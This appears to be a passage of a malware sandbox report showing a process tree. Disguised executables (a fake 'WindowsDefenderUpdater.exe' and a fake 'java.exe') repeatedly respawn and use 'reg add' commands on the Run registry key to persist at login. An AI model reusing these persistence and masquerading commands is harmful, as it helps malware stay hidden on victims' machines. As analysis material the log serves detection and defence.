C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"118⤵PID:4848
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"119⤵PID:5856
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"118⤵PID:5476
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"118⤵
- Checks computer location settings
PID:908 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8DEE.tmp\8DEF.tmp\8DF0.bat C:\Windows\system32\java.exe"119⤵
- Drops file in System32 directory
PID:4636 -
C:\Windows\system32\timeout.exetimeout 1120⤵PID:3860
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f120⤵PID:3880
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f120⤵PID:4888
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f120⤵
- Adds Run key to start application
PID:5136
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f120⤵PID:4988
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"120⤵PID:5740
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"121⤵PID:2712
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"120⤵PID:60
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"120⤵
- Checks computer location settings
PID:1484 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\95BE.tmp\95BF.tmp\95C0.bat C:\Windows\system32\java.exe"121⤵
- Drops file in System32 directory
PID:2972 -
C:\Windows\system32\timeout.exetimeout 1122⤵PID:2628
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-